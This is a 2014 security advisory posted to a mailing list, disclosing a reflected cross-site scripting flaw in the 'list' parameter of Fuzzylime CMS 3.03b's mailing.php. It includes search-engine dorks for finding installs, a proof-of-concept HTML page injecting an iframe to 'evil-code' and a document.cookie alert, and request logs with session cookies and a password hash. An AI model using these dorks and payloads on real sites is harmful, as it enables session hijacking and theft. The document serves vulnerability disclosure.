
Date: Tue, 16 Dec 2014 20:45:22 +0100
From: Vulnerability Lab <research@...nerability-lab.com>
To: bugtraq@...urityfocus.com, bugs@...uritytracker.com
Subject: Fuzzylime v3.03b CMS - CS Cross Scripting Vulnerability

Document Title:
===============
Fuzzylime v3.03b CMS - CS Cross Scripting Vulnerability


References (Source):
====================
http://vulnerability-lab.com/get_content.php?id=1357


Release Date:
=============
2014-12-02


Vulnerability Laboratory ID (VL-ID):
====================================
1357


Common Vulnerability Scoring System:
====================================
2.4


Product & Service Introduction:
===============================
Fuzzylime (cms) is the easiest way for you to run your site and keep it up-to-date. Once installed, you can update from any 
internet-connected PC in the world – you don`t even need to know HTML! It has tons of features so whatever you want from 
your site, chances are this script will be able to do it for you.

(Copy of the Homepage: http://www.fuzzylime.co.uk/ )


Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a client-side cross site scripting vulnerability in the official Fuzzylime v3.03b CMS.


Vulnerability Disclosure Timeline:
==================================
2014-12-02:	Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
FuzzyLime Limited
Product: Fuzzylime - Content Management System 3.03b


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Technical Details & Description:
================================
A client-side cross site scripting web vulnerability has been discovered in the official Fuzzylime v3.03b Content Management System.
The non-persistent web vulnerability allows to manipulate client-side application requests to compromise user session information.

The vulnerability is located in the mailing.php file. Remote attackers are able to inject client-side script codes by usage of the GET 
method request with the vulnerable list value. The encoding of the list value in the mailing.php file is broken. The attack vector is 
non-persistent and the request method to inject is GET. 

The security risk of the client-side vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 2.4.
Exploitation of the non-persistent cross site vulnerability requires no privileged web-application user account and low user interaction. 
Successful exploitation of the vulnerabilities result in client-side phishing, client-side session hijacking attacks, client-side external 
redirect to malicious sources and client-side manipulation of affected or connected module context.

Request Method(s):
					[+] GET

Vulnerable Module(s):
					[+] Mailinglist

Vulnerable File(s):
					[+] mailing.php

Vulnerable Parameter(s):
					[+] list


Proof of Concept (PoC):
=======================
The client-side cross site scripting vulnerability can be exploited by remote attackers without privileged application user account and low user interaction. 
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.

Google Dork(s):
allinurl:powered by fuzzylime (cms)
title:powered by fuzzylime (cms)


PoC: Mailing.php
http://fuzzylime.127.0.0.1:8080/fuzzylime/admin/mailing.php?list="><[CROSS SITE SCRIPTING VULNERABILITY!]>


Exploit: Client-Side Cross Site Scripting Vulnerability

<html>
<head><body>
<title>PoC: Client-Side Cross Site Scripting Vulnerability</title>
<img src=http://fuzzylime.127.0.0.1:8080/fuzzylime/admin/mailing.php?list=%3E%22%3Ciframe%20src=http://evil-code%3E>
<img src=http://fuzzylime.127.0.0.1:8080/fuzzylime/admin/mailing.php?list=%3E%22%3Cscript>alert(document.cookie)</script><div style="1
</body></head>
<html>


Code Review: Mailing list

<h2>Mailing list  |  "><[CROSS SITE SCRIPTING VULNERABILITY!]>'</h2><p/>
Enter addresses in the box below - one per line.<p/>
form method="post" action="mailing.php?list="><[CROSS SITE SCRIPTING VULNERABILITY!]>'&opt=add_x"><textarea name="emails" cols="60" rows="20">textarea<br/>
<input type="x_submit" value="Add_x"/></form></div>
<div class="footer">powered by <a href="http://cms.fuzzylime.co.uk" target="_blank">fuzzylime (cms)</a></div>
</div></body>
</html></h2>


--- PoC Session Logs [GET] ---
Status: 200[OK] 
GET http://fuzzylime.127.0.0.1:8080/fuzzylime/admin/mailing.php?list=%3Cscript%3Ealert(document.cookie)%3C/script%3E&opt=edit 
Load Flags[LOAD_DOCUMENT_URI  LOAD_INITIAL_DOCUMENT_URI  ] Größe des Inhalts[1073] Mime Type[text/html]
   Request Header:
      Host[http://fuzzylime.127.0.0.1:8080]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      Cookie[cookuser=admin; cookpass=fe01ce2a7fbac8fafaed7c982a04e229; __utma=87180614.840276727.1416877709.1416877709.1416911036.2; __utmc=87180614; __utmz=87180614.1416877709.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __gads=ID=d85f413774f5f900:T=1416878167:S=ALNI_MZhnbZ041rSNwxKoJP5Bx81E492AQ; PHPSESSID=0acs99b01rsa8nlpofngo5t3j3; typo3-login-cookiecheck=true; etomite_etomite_web=t6aar607egkmj2dbkchfqetud1; etomite_etomite_mgr=hs2irnik5695p06s33ahbni545; etomite_etomite_=%255D%25EC%2503%25F6%25E4; 90a7a5e1983e256afa84ef8646bae7bc=0cdiqpkpqq2qnr8j146v7oolb3; InterPhotoFKZot3ekKXKuu=bdbe2ea137979d10eab0c1971a6c98a1; OS_WysGui=qk0b056dctmh8v5rqdhuua4pk7]
      Connection[keep-alive]
   Response Header:
      Server[nginx/0.7.65]
      Date[Tue, 25 Nov 2014 10:56:32 GMT]
      Content-Type[text/html]
      Connection[keep-alive]
      Keep-Alive[timeout=20]
      X-Powered-By[PHP/5.3.10-1~lucid+2uwsgi2]
      Vary[Accept-Encoding]
      Content-Encoding[gzip]
      Content-Length[1073]



-
Status: 200[OK] 
GET http://fuzzylime.127.0.0.1:8080/fuzzylime/templates/scripts/ajax.js.php 
Load Flags[LOAD_NORMAL] Größe des Inhalts[4696] Mime Type[text/html]
   Request Header:
      Host[fuzzylime.127.0.0.1:8080]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0]
      Accept[*/*]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      Referer[http://fuzzylime.127.0.0.1:8080/fuzzylime/admin/mailing.php?list=%3Cscript%3Ealert(document.cookie)%3C/script%3E&opt=edit]
      Cookie[__utma=87180614.840276727.1416877709.1416877709.1416911036.2; __utmc=87180614; __utmz=87180614.1416877709.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __gads=ID=d85f413774f5f900:T=1416878167:S=ALNI_MZhnbZ041rSNwxKoJP5Bx81E492AQ; PHPSESSID=0acs99b01rsa8nlpofngo5t3j3; typo3-login-cookiecheck=true; cms_etomite_etomite_web=t6aar607egkmj2dbkchfqetud1; cms_etomite_etomite_mgr=hs2irnik5695p06s33ahbni545; cms_etomite_etomite_=%255D%25EC%2503%25F6%25E4; 90a7a5e1983e256afa84ef8646bae7bc=0cdiqpkpqq2qnr8j146v7oolb3; InterPhotoFKZot3ekKXKuu=bdbe2ea137979d10eab0c1971a6c98a1; OS_WysGui=qk0b056dctmh8v5rqdhuua4pk7]
      Connection[keep-alive]
   Response Header:
      Server[nginx/0.7.65]
      Date[Tue, 25 Nov 2014 10:56:32 GMT]
      Content-Type[text/html]
      Connection[keep-alive]
      Keep-Alive[timeout=20]
      X-Powered-By[PHP/5.3.10-1~lucid+2uwsgi2]
      Vary[Accept-Encoding]
      Content-Encoding[gzip]
      Content-Length[4696]


Reference(s):
http://fuzzylime.127.0.0.1:8080/fuzzylime/
http://fuzzylime.127.0.0.1:8080/fuzzylime/admin/
http://fuzzylime.127.0.0.1:8080/fuzzylime/admin/mailing.php


Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure parse and encode of the vulnerability list value in the mailing.php file.
Restrict the input values and protect the application with an exception to prevent client-side cross site scripting vulnerabilities.


Security Risk:
==============
The security risk of the non-persistent cross site scripting web vulnerability in the list value is estimated as medium. (CVSS 2.4)


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@...lution-sec.com) [www.vulnerability-lab.com]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed 
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable 
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab 
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for 
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, 
policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com   	- www.vuln-lab.com			       		- www.evolution-sec.com
Contact:    admin@...nerability-lab.com 	- research@...nerability-lab.com 	       		- admin@...lution-sec.com
Section:    magazine.vulnerability-db.com	- vulnerability-lab.com/contact.php		       	- evolution-sec.com/contact
Social:	    twitter.com/#!/vuln_lab 		- facebook.com/VulnerabilityLab 	       		- youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php	- vulnerability-lab.com/rss/rss_upcoming.php   		- vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php  	- vulnerability-lab.com/list-of-bug-bounty-programs.php	- vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to 
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by 
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website 
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact 
(admin@...nerability-lab.com or research@...nerability-lab.com) to get a permission.

				Copyright © 2014 | Vulnerability Laboratory - Evolution Security GmbH ™



-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@...nerability-lab.com
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt


